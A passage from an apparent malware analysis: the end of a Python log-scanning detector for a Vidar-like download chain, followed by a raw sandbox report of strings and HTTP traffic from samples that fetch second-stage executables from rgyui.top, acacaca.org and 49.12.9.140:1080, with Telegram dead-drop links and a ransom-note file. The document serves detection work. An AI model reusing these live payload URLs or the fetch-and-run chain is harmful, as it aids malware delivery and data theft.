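if __name__ == "__main__":
    hits, chains = scan(SAMPLE_LOG)
    for method, host, path, tags in hits:
        print(f"{method:4} {host:14} {path:60} {tags}")
    print("vidar-like chain to:", chains)
```

The chain rule keys on the endpoint rather than the IP alone so that the non-standard port (1080 here) stays part of the match; the 32-hex-digit pid is the width of an MD5 digest, which is consistent with the CryptCreateHash / CryptGetHashParam / _sprintf chain at 1_2_0040E870, though the report does not confirm what is hashed.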
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140/
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140/ppData
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140/r
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140/rontdesk
Source: build2.exe, 0000000D.00000003.421064532.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.620168713.00000000022C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/)
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/1Y
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/2277399138.zip
Source: build2.exe, 0000000D.00000003.426193570.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.429044334.00000000006B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/2277399138.zipF
Source: build2.exe, 0000000D.00000003.426193570.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.429044334.00000000006B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/2277399138.zipJ
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/2277399138.zipm
Source: build2.exe, 0000000D.00000003.426193570.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.429044334.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/517
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/C
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/a
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/n
Source: build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080/nS
Source: build2.exe, 0000000D.00000002.620168713.00000000022C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://49.12.9.140:1080;Dx66
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.640491623.000000000932B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/files/1/build3.exe
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/files/1/build3.exe$run
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/files/1/build3.exed5
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/files/1/build3.exerun0d
Source: 2OmglUwx83.exe, 00000008.00000002.616576425.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/test2/get.php
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acacaca.org/test2/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.426193570.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.421331179.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.429044334.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.618087943.0000000000697000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.420871473.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 2OmglUwx83.exe, 00000000.00000002.355123959.0000000002290000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 
0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://rgyui.top/dl/build2.exe
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://rgyui.top/dl/build2.exe$run
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://rgyui.top/dl/build2.exerunb4e97Bx
Source: 2OmglUwx83.exe, 00000008.00000002.618329989.000000000089D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://rgyui.top/dl/build2.exe~
Source: 2OmglUwx83.exe, 00000008.00000003.446980506.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.amazon.com/
Source: 2OmglUwx83.exe, 00000008.00000003.448986440.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: 2OmglUwx83.exe, 00000008.00000003.449617423.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.live.com/
Source: 2OmglUwx83.exe, 00000008.00000003.450139669.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
Source: 2OmglUwx83.exe, 0000000F.00000002.430133993.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 2OmglUwx83.exe, 00000008.00000003.450756863.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.reddit.com/
Source: 2OmglUwx83.exe, 00000008.00000003.451162735.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
Source: 2OmglUwx83.exe, 00000008.00000003.451796823.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.wikipedia.com/
Source: 2OmglUwx83.exe, 00000008.00000003.459725373.0000000002F30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/J
Source: 2OmglUwx83.exe, 2OmglUwx83.exe, 00000001.00000002.363606430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.353098499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000001.00000000.351375798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000006.00000002.382228538.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000007.00000002.424010722.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.379648338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000000.377762737.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.616576425.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.613049042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.392479956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000002.408000172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.398886429.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000E.00000002.427528493.0000000002210000.00000040.00001000.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2OmglUwx83.exe, 0000000F.00000000.423610387.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonrO
Source: 2OmglUwx83.exe, 00000008.00000002.617874262.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000003.382768151.0000000000857000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/n
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: build2.exe, 0000000D.00000003.421064532.00000000006AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: build2.exe, 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://mas.to/
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/&
Source: build2.exe, 0000000D.00000003.421064532.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000003.421331179.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly1
Source: build2.exe, 0000000D.00000003.421331179.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly11
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly17&A
Source: build2.exe, 0000000D.00000000.409643469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000000.410137244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly1https://mas.to/
Source: build2.exe, 0000000D.00000002.616887560.0000000000671000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/pegasusfly1w
Source: 2OmglUwx83.exe, 00000008.00000002.620281101.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://we.tl/t-QsoSRIeA
Source: 2OmglUwx83.exe, 00000008.00000002.619234248.00000000008B6000.00000004.00000020.00020000.00000000.sdmp, 2OmglUwx83.exe, 00000008.00000002.620281101.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, _readme.txt0.8.dr String found in binary or memory: https://we.tl/t-QsoSRIeAK6
Source: build2.exe, 0000000D.00000003.420871473.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: build2.exe, 0000000D.00000003.428990871.00000000279A1000.00000004.00000800.00020000.00000000.sdmp, 05322493605623596985969059.13.dr, 71094135503925161979660642.13.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: api.2ip.ua
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 1_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /pegasusfly1 HTTP/1.1Host: t.me
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: rgyui.top
Source: global traffic HTTP traffic detected: GET /test2/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: acacaca.org
Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: acacaca.org
Source: global traffic HTTP traffic detected: GET /517 HTTP/1.1Host: 49.12.9.140:1080
Source: global traffic HTTP traffic detected: GET /2277399138.zip HTTP/1.1Host: 49.12.9.140:1080Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Aug 2022 09:22:43 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Content-Length: 216Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 69 6c 65 73 2f 31 2f 62 75 69 6c 64 33 2e 65 78 65 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /files/1/build3.exe was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 05 Aug 2022 09:22:56 GMTContent-Type: application/zipContent-Length: 3642574Last-Modified: Mon, 04 Jul 2022 10:49:28 GMTConnection: keep-aliveETag: "62c2c5b8-3794ce"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 10 6e 55 53 4b 12 b5 9b fc b5 00 00 48 47 01 00 10 00 1c 00 76 63 72 75 6e 74 69 6d 65 31 34 30 2e 64 6c 6c 55 54 09 00 03 b0 6f 71 61 b0 6f 71 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ec fd 0b 40 54 d5 bb 38 0c ef 61 06 18 71 60 46 05 45 45 1d 15 6f e1 65 98 e1 3e c3 55 06 f1 82 0e 22 e0 0d 11 b9 38 20 02 c1 1e d4 14 45 07 ca 71 37 e5 af ac ac ac 34 ad 9f 95 95 95 99 99 19 88 09 98 29 5e 32 4b 2b 34 aa 4d 43 8a 4a 80 4a ce f7 3c 6b ef 81 01 c5 73 ce ff 7d cf 7b be f7 fb 0e ba f6 65 5d 9e f5 ac 67 3d b7 b5 f6 5a 6b e2 16 6e a5 84 14 45 89 20 58 ad 14 75 88 e2 fe 22 a8 ff f8 af 19 82 db 88 c3 6e d4 81 3e df 8e 3c 24 98 f5 ed c8 79 fa ec 22 79 41 61 fe f2 c2 b4 95 f2 f4 b4 bc bc 7c 5a be 2c 53 5e 68 c8 93 67 e7 c9 a3 e7 24 c8 57 e6 67 64 4e 76 75 75 f1 e6 61 08 ee ec 9e ad dd fe ed 30 5b b8 29 1a 35 6c 1a dc 67 d5 2f 19 36 9b c4 9d 1a 96 0b f7 1d 77 6b bd 12 c9 fd b4 57 12 b9 d7 78 45 92 fb d7 5e a9 e4 fe ad 57 34 b9 2b 87 71 f7 33 e4 7d 6e 76 ba 1e e1 da 70 d6 69 29 6a 96 c0 91 92 04 8d 5b 60 8b ab a7 46 8d ec 2b 70 eb 4b fd 09 2f 72 3e f2 03 08 32 82 21 45 9e f0 d9 81 a2 9c e0 e6 42 71 77 8e 50 02 42 bc 23 fd 1c 80 8e 11 91 a4 90 8c 2b c2 dd b9 db 7e 20 96 7b 1f 8a aa 90 09 a8 a7 31 52 2e a0 c4 22 3b 62 8a 05 54 6c 38 dc 15 02 6a 1b 54 b0 7f 04 45 05 3d 82 f6 ec 88 1e 7d 04 70 8f 3c 22 ff 64 3a 73 35 0d f7 e3 8d 3c 42 d8 56 51 f7 3c d0 f4 a5 93 33 d2 e8 34 78 8e 76 e2 db 0e 6d a6 ae 77 cf 07 f5 56 4c ce e6 32 1e 72 e4 ea 26 04 69 7e 20 5f c4 e4 c2 a2 c2 74 6c 9e 88 6b 33 c9 d7 fa b0 7c 99 b9 f9 90 11 db 8e 34 a0 24 70 ef 78 20 5f d4 23 9a f8 bf 7f ff 07 7f 05 63 e1 52 07 17 41 33 3e 6d 1d 07 97 88 f1 18 f7 18 26 fb 40 d0 e1 65 2b 5e 76 e2 65 3f 5e 2a f0 52 87 17 f9 44 b8 28 f0 12 81 97 7a bc c8 26 61 2a 5e a8 c9 f8 8a 97 a5 78 69 56 62 09 3f 4c 40 e6 56 04 23 bc 10 7c d5 e0 13 5e a8 50 2c 11 86 25 f0 52 81 97 7a bc 50 28 1d a5 78 59 1a 81 88 47 63 02 5e 28 2d 56 8e 97 02 f2 14 83 38 e3 65 29 5e b6 e2 85 9a 86 f5 e2 25 02 2f 4b f1 a2 98 8e f0 66 22 a6 78 69 c6 0b 35 0b f3 e1 25 02 2f a5 e4 35 0e d1 c0 4b c1 3b 18 87 97 ad 78 d9 8f 97 0a f2 f4 2e e6 7b 0f 81 e2 25 02 2f 4b f1 52 40 5e f7 61 09 bc d4 e1 85 68 96 f1 70 11 b4 e3 45 b4 1f 2e 8a fd 08 0a 2f e2 8f b0 ec c7 48 6c bc c8 3f 41 a0 78 89 c7 cb 8b 78 a1 3e 85 12 05 07 91 4c 5f 20 0d ea 10 fc 59 7c fd 1e 9f ae 60 63 7e c2 b2 bf 20 a8 7a c4 e0 37 c4 05 2f 4b 7f 87 b2 3b f1 52 f7 3b 26 b0 08 0a 55 81 ce 82 55 5a 1e e0 0f d4 7e a5 72 4a 06 99 64 0a 07 81 ac 14 02 c5 75 b6 6c af 3b 25 6b 80 20 f7 a0 64 b2 a1 94 cc 1b 42 04 84 79 10 68 08 fb 20 fe 10 84 0a 08 a7 20 5c 82 d0 00 a1 19 02 35 90 92 49 20 b8 43 f0 82 30 1e 82 1f 84 b0 81 9c d6 8c 80 7b 2c 04 1d 84 79 10 e6 43 58 0c 61 29 84 0c 08 7a 08 b9 10 56 43 58 07
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.9.140
